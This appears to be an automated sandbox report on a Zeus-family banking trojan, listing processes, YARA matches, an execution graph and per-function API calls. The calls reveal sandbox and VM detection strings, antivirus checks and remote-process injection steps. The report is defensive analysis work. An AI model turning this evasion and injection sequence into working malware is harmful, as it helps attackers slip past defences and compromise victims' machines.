                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                              Start time:12:33:52
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 756
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                              Start time:12:33:53
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.1908352092.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:1.1%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:63.8%
                                                                                                                                                                                                                Total number of Nodes:254
                                                                                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                                                                                execution_graph 30375 402d30 LoadLibraryA GetModuleFileNameA 30447 403a20 RegOpenKeyExA 30375->30447 30378 402d64 ExitProcess 30379 402d6c 30461 4021d0 CreateFileA 30379->30461 30384 402da1 30472 402360 CreateFileA 30384->30472 30385 402d89 GetTickCount PostMessageA 30385->30384 30394 402dc1 30584 401ea0 40 API calls 30394->30584 30395 402de3 IsUserAnAdmin GetModuleHandleA 30396 402e1c 30395->30396 30397 402dfd GetProcAddress 30395->30397 30400 402e22 30396->30400 30401 402e6e 30396->30401 30397->30396 30399 402e0f GetCurrentProcess 30397->30399 30399->30396 30407 402e26 StrStrIA 30400->30407 30408 402e3c 30400->30408 30405 402e76 StrStrIA 30401->30405 30406 402efd 30401->30406 30402 402dc6 30403 402dd2 30402->30403 30404 402dca ExitProcess 30402->30404 30585 403560 70 API calls 30403->30585 30410 402ea1 30405->30410 30411 402e8c 30405->30411 30414 402930 9 API calls 30406->30414 30407->30408 30412 402e5f 30407->30412 30498 402930 RegCreateKeyExA 30408->30498 30418 402a70 106 API calls 30410->30418 30417 402930 9 API calls 30411->30417 30538 402a70 VirtualQuery GetModuleFileNameA 30412->30538 30420 402f08 GlobalFindAtomA 30414->30420 30416 402dd7 30416->30395 30424 402ddb ExitProcess 30416->30424 30425 402e97 30417->30425 30426 402ea6 GlobalFindAtomA 30418->30426 30421 402f58 ExitProcess 30420->30421 30422 402f18 GlobalAddAtomA IsUserAnAdmin 30420->30422 30431 402f39 IsUserAnAdmin 30422->30431 30432 402f29 30422->30432 30586 4028d0 43 API calls 30425->30586 30428 402ef6 30426->30428 30429 402eb6 GlobalAddAtomA IsUserAnAdmin 30426->30429 30439 4012b0 9 API calls 30428->30439 30435 402ed7 IsUserAnAdmin 30429->30435 30436 402ec7 30429->30436 30437 402f44 30431->30437 30432->30431 30440 402ee2 30435->30440 30436->30435 30588 4015a0 7 API calls 30437->30588 30438 402e69 30438->30421 30439->30438 30587 4015a0 7 API calls 30440->30587 30443 402f4f 30443->30421 30445 401670 32 API calls 30443->30445 30444 402eed 30444->30428 30446 401670 32 API calls 30444->30446 30445->30421 30446->30428 30448 403a6a RegQueryValueExA 30447->30448 30449 403acd GetUserNameA CharUpperA strstr 30447->30449 30451 403a9b RegCloseKey 30448->30451 30452 403a8f RegCloseKey 30448->30452 30450 403b0b strstr 30449->30450 30453 402d60 30449->30453 30450->30453 30455 403b24 strstr 30450->30455 30451->30449 30454 403aae 30451->30454 30452->30449 30453->30378 30453->30379 30454->30449 30454->30453 30455->30453 30456 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 30455->30456 30456->30453 30457 403b7d 30456->30457 30457->30453 30458 403b99 GetModuleFileNameA StrStrIA 30457->30458 30458->30453 30459 403bc5 StrStrIA 30458->30459 30459->30453 30460 403bd7 StrStrIA 30459->30460 30460->30453 30462 402350 30461->30462 30463 402320 DeviceIoControl CloseHandle 30461->30463 30464 4020e0 memset SHGetFolderPathA 30462->30464 30463->30462 30465 4021a7 30464->30465 30466 40213e PathAppendA SetCurrentDirectoryA 30464->30466 30468 4021b2 FindWindowA 30465->30468 30469 4021ab FreeLibrary 30465->30469 30466->30465 30467 402161 LoadLibraryA 30466->30467 30467->30465 30470 402175 GetProcAddress 30467->30470 30468->30384 30468->30385 30469->30468 30470->30465 30471 402185 30470->30471 30471->30465 30473 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 30472->30473 30474 402444 30472->30474 30473->30474 30475 402450 SHGetFolderPathA 30474->30475 30476 402535 30475->30476 30477 402477 30475->30477 30479 402540 SHGetFolderPathA 30476->30479 30477->30477 30478 4024ec MoveFileA 30477->30478 30478->30476 30480 40256b CreateFileA 30479->30480 30483 40266f 30479->30483 30482 4025d1 11 API calls 30480->30482 30480->30483 30482->30483 30484 402680 CoInitializeEx 30483->30484 30485 4026ae 30484->30485 30486 4026bf GetModuleFileNameW SysAllocString 30484->30486 30485->30486 30488 4028c4 IsUserAnAdmin 30485->30488 30487 4026ed SysAllocString 30486->30487 30492 402866 30486->30492 30489 402853 SysFreeString 30487->30489 30490 4026fe CoCreateInstance 30487->30490 30488->30394 30488->30395 30491 402863 SysFreeString 30489->30491 30489->30492 30494 402827 30490->30494 30495 402725 30490->30495 30491->30492 30492->30488 30493 4028be CoUninitialize 30492->30493 30493->30488 30494->30489 30495->30489 30495->30494 30496 4027b3 CoCreateInstance 30495->30496 30497 4027d5 30496->30497 30497->30494 30499 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 30498->30499 30500 4029fd RegCreateKeyExA 30498->30500 30502 4029e0 30499->30502 30501 402a44 30500->30501 30500->30502 30503 402a4c RegFlushKey RegCloseKey 30501->30503 30504 402a5d GetCurrentProcessId 30501->30504 30502->30502 30505 402a3e RegSetValueExA 30502->30505 30503->30504 30506 401670 30504->30506 30505->30501 30507 4018d8 Sleep 30506->30507 30509 401686 30506->30509 30507->30421 30510 4016a5 30509->30510 30511 40169b Sleep 30509->30511 30589 401cf0 11 API calls 30509->30589 30590 401cf0 11 API calls 30510->30590 30511->30509 30511->30510 30513 4016ac 30514 4018d3 30513->30514 30515 4016b4 OpenProcess 30513->30515 30514->30507 30515->30514 30516 4016cf GetModuleHandleA 30515->30516 30517 401706 30516->30517 30518 4016eb GetProcAddress 30516->30518 30520 40170c GetModuleHandleA 30517->30520 30521 40173f VirtualAllocEx 30517->30521 30518->30517 30519 4016f9 GetCurrentProcess 30518->30519 30519->30517 30524 401722 GetProcAddress 30520->30524 30525 40172e 30520->30525 30522 4018b0 GetHandleInformation 30521->30522 30523 401782 WriteProcessMemory 30521->30523 30522->30514 30527 4018c6 30522->30527 30526 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 30523->30526 30532 4017ae 30523->30532 30524->30525 30525->30521 30525->30522 30530 401862 GetHandleInformation 30526->30530 30531 40188e RtlCreateUserThread 30526->30531 30527->30514 30528 4018cc CloseHandle 30527->30528 30528->30514 30529 4017b1 VirtualAlloc 30529->30532 30533 4017c9 memcpy WriteProcessMemory VirtualFree 30529->30533 30534 401885 30530->30534 30535 401878 30530->30535 30531->30522 30532->30529 30536 401819 30532->30536 30533->30532 30534->30522 30535->30534 30537 40187e CloseHandle 30535->30537 30536->30526 30537->30534 30539 402ad0 30538->30539 30539->30539 30540 402adf PathFileExistsA 30539->30540 30541 402af2 GetSystemWindowsDirectoryA 30540->30541 30542 402bf9 _snprintf CopyFileA 30540->30542 30543 402b07 30541->30543 30544 402d26 30542->30544 30545 402c36 30542->30545 30543->30543 30547 402b0f GetModuleHandleA 30543->30547 30579 4012b0 VirtualQuery GetModuleFileNameA PathFileExistsA 30544->30579 30546 402930 9 API calls 30545->30546 30548 402c3f 30546->30548 30549 402b67 30547->30549 30550 402b47 GetProcAddress 30547->30550 30591 401b20 30548->30591 30551 402b96 GetTickCount 30549->30551 30577 402b6d 30549->30577 30550->30549 30553 402b59 GetCurrentProcess 30550->30553 30660 401390 GetTickCount GetModuleHandleA GetProcAddress 30551->30660 30553->30549 30557 402ba2 30661 401420 GetTickCount GetModuleHandleA GetProcAddress 30557->30661 30560 402c59 RtlImageNtHeader 30562 402c64 30560->30562 30563 402c7d GetProcessHeap HeapValidate 30560->30563 30561 402c9d 30638 401be0 CreateFileA 30561->30638 30620 401000 30562->30620 30563->30561 30566 402c92 GetProcessHeap HeapFree 30563->30566 30566->30561 30568 402c7b 30568->30563 30569 402cef 30572 402cff GlobalFindAtomA 30569->30572 30649 4014b0 memset memset lstrcpynA CreateProcessA 30569->30649 30570 402ccf GetProcAddress 30570->30569 30571 402ce1 GetCurrentProcess 30570->30571 30571->30569 30574 402d1b GlobalAddAtomA 30572->30574 30575 402d0f 30572->30575 30574->30544 30576 4012b0 9 API calls 30575->30576 30578 402d14 ExitProcess 30576->30578 30577->30542 30580 40137f 30579->30580 30581 40130c GetTempPathA GetTempFileNameA MoveFileExA 30579->30581 30580->30438 30581->30580 30582 401353 SetFileAttributesA DeleteFileA 30581->30582 30582->30580 30583 401373 MoveFileExA 30582->30583 30583->30580 30584->30402 30585->30416 30586->30438 30587->30444 30588->30443 30589->30509 30590->30513 30592 401bd7 30591->30592 30593 401b3b 30591->30593 30604 401150 30592->30604 30594 401150 16 API calls 30593->30594 30595 401b44 30594->30595 30595->30592 30596 401b4e RtlImageNtHeader 30595->30596 30597 401bb5 GetProcessHeap HeapValidate 30596->30597 30598 401b5b GetTickCount GetModuleHandleA 30596->30598 30597->30592 30601 401bcb GetProcessHeap HeapFree 30597->30601 30599 401b95 30598->30599 30600 401b7e GetProcAddress 30598->30600 30603 401000 20 API calls 30599->30603 30600->30599 30602 401b8e 30600->30602 30601->30592 30602->30599 30603->30597 30605 401166 CreateFileA 30604->30605 30606 40127b 30604->30606 30605->30606 30608 401188 GetFileSizeEx 30605->30608 30607 401282 IsBadWritePtr 30606->30607 30609 401291 30606->30609 30607->30609 30610 4011a7 GetProcessHeap RtlAllocateHeap 30608->30610 30617 40124a 30608->30617 30609->30560 30609->30561 30612 4011d5 30610->30612 30613 4011c6 memset 30610->30613 30611 40125f GetHandleInformation 30611->30606 30614 40126e 30611->30614 30615 4011dc SetFilePointer LockFile ReadFile UnlockFile 30612->30615 30612->30617 30613->30612 30614->30606 30616 401274 CloseHandle 30614->30616 30615->30617 30618 401228 GetProcessHeap HeapValidate 30615->30618 30616->30606 30617->30606 30617->30611 30618->30617 30619 40123e GetProcessHeap HeapFree 30618->30619 30619->30617 30621 401017 30620->30621 30622 401139 30620->30622 30621->30622 30623 401028 CreateFileA 30621->30623 30622->30568 30623->30622 30624 40104a 30623->30624 30662 401e00 GetCurrentThread OpenThreadToken 30624->30662 30627 401053 ConvertStringSecurityDescriptorToSecurityDescriptorW 30628 4010aa SetFilePointer LockFile WriteFile UnlockFile 30627->30628 30631 40106a GetSecurityDescriptorSacl 30627->30631 30629 401105 30628->30629 30630 4010f5 SetEndOfFile 30628->30630 30634 401113 GetHandleInformation 30629->30634 30635 40112f 30629->30635 30630->30629 30632 4010a0 LocalFree 30631->30632 30633 40108b SetNamedSecurityInfoA 30631->30633 30632->30628 30633->30632 30634->30635 30636 401122 30634->30636 30635->30568 30636->30635 30637 401128 CloseHandle 30636->30637 30637->30635 30639 401c12 GetFileTime 30638->30639 30640 401ca5 MoveFileExA GetModuleHandleA 30638->30640 30641 401c30 GetHandleInformation 30639->30641 30642 401c4c CreateFileA 30639->30642 30640->30569 30640->30570 30641->30642 30643 401c3f 30641->30643 30642->30640 30644 401c6b SetFileTime 30642->30644 30643->30642 30645 401c45 CloseHandle 30643->30645 30644->30640 30646 401c89 GetHandleInformation 30644->30646 30645->30642 30646->30640 30647 401c98 30646->30647 30647->30640 30648 401c9e CloseHandle 30647->30648 30648->30640 30650 401533 30649->30650 30651 40158f 30649->30651 30652 401545 GetHandleInformation 30650->30652 30653 40155d 30650->30653 30651->30572 30652->30653 30654 401550 30652->30654 30655 401581 30653->30655 30656 401569 GetHandleInformation 30653->30656 30654->30653 30657 401556 CloseHandle 30654->30657 30655->30572 30656->30655 30658 401574 30656->30658 30657->30653 30658->30655 30659 40157a CloseHandle 30658->30659 30659->30655 30660->30557 30661->30577 30663 401e21 GetCurrentProcess OpenProcessToken 30662->30663 30664 401e38 LookupPrivilegeValueA 30662->30664 30663->30664 30665 40104f 30663->30665 30666 401e82 CloseHandle 30664->30666 30667 401e5b AdjustTokenPrivileges 30664->30667 30665->30627 30665->30628 30666->30665 30667->30666 30668 401e75 GetLastError 30667->30668 30668->30666 30669 401e7f 30668->30669 30669->30666

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 3 402d64-402d66 ExitProcess 0->3 4 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 0->4 9 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 4->9 10 402d89-402d9b GetTickCount PostMessageA 4->10 19 402dc1-402dc8 call 401ea0 9->19 20 402de3-402dfb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402dd2-402dd9 call 403560 19->28 29 402dca-402dcc ExitProcess 19->29 21 402e1c-402e20 20->21 22 402dfd-402e0d GetProcAddress 20->22 25 402e22-402e24 21->25 26 402e6e-402e70 21->26 22->21 24 402e0f-402e19 GetCurrentProcess 22->24 24->21 32 402e26-402e3a StrStrIA 25->32 33 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 25->33 30 402e76-402e8a StrStrIA 26->30 31 402efd-402f16 call 402930 GlobalFindAtomA 26->31 28->20 49 402ddb-402ddd ExitProcess 28->49 35 402ea1-402eb4 call 402a70 GlobalFindAtomA 30->35 36 402e8c-402e9c call 402930 call 4028d0 30->36 46 402f58-402f5a ExitProcess 31->46 47 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 31->47 32->33 37 402e5f-402e64 call 402a70 call 4012b0 32->37 33->46 53 402ef6-402efb call 4012b0 35->53 54 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 35->54 36->46 64 402e69 37->64 56 402f39-402f42 IsUserAnAdmin 47->56 57 402f29-402f31 47->57 53->46 60 402ed7-402ee0 IsUserAnAdmin 54->60 61 402ec7-402ecf 54->61 62 402f44 56->62 63 402f49-402f51 call 4015a0 56->63 57->56 67 402ee2 60->67 68 402ee7-402eef call 4015a0 60->68 61->60 62->63 63->46 74 402f53 call 401670 63->74 64->46 67->68 68->53 75 402ef1 call 401670 68->75 74->46 75->53
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                  • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                                • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                • String ID: IsWow64Process$PnEw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3353599405-2298154373
                                                                                                                                                                                                                • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                                • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                                Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 129 403a20-403a68 RegOpenKeyExA 130 403a6a-403a8d RegQueryValueExA 129->130 131 403acd-403b05 GetUserNameA CharUpperA strstr 129->131 134 403a9b-403aac RegCloseKey 130->134 135 403a8f-403a99 RegCloseKey 130->135 132 403beb 131->132 133 403b0b-403b1e strstr 131->133 136 403bec-403bf2 132->136 133->132 138 403b24-403b37 strstr 133->138 134->131 137 403aae-403ab5 134->137 135->131 137->131 139 403ab7-403abe 137->139 138->132 140 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 138->140 139->131 141 403ac0-403ac7 139->141 140->132 142 403b7d-403b82 140->142 141->131 141->136 142->132 143 403b84-403b89 142->143 143->132 144 403b8b-403b90 143->144 144->132 145 403b92-403b97 144->145 145->132 146 403b99-403bc3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403bc5-403bd5 StrStrIA 146->147 147->132 148 403bd7-403be7 StrStrIA 147->148 148->132 149 403be9 148->149 149->132
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                                • API String ID: 1431998568-3499098167
                                                                                                                                                                                                                • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                                • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                                Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 150 4021d0-40231e CreateFileA 151 402350-402355 150->151 152 402320-40234a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                • API String ID: 33631002-3172865025
                                                                                                                                                                                                                • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                                • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                                Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 153 401150-401160 154 401166-401182 CreateFileA 153->154 155 40127b-401280 153->155 154->155 158 401188-4011a1 GetFileSizeEx 154->158 156 401282-40128f IsBadWritePtr 155->156 157 40129f 155->157 159 4012a1-4012a7 156->159 160 401291-40129c 156->160 157->159 161 401254-40125d 158->161 162 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 158->162 161->155 163 40125f-40126c GetHandleInformation 161->163 164 4011d5-4011da 162->164 165 4011c6-4011d2 memset 162->165 163->155 166 40126e-401272 163->166 164->161 167 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 164->167 165->164 166->155 168 401274-401275 CloseHandle 166->168 169 401251 167->169 170 401228-40123c GetProcessHeap HeapValidate 167->170 168->155 169->161 171 40124a 170->171 172 40123e-401244 GetProcessHeap HeapFree 170->172 171->169 172->171
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
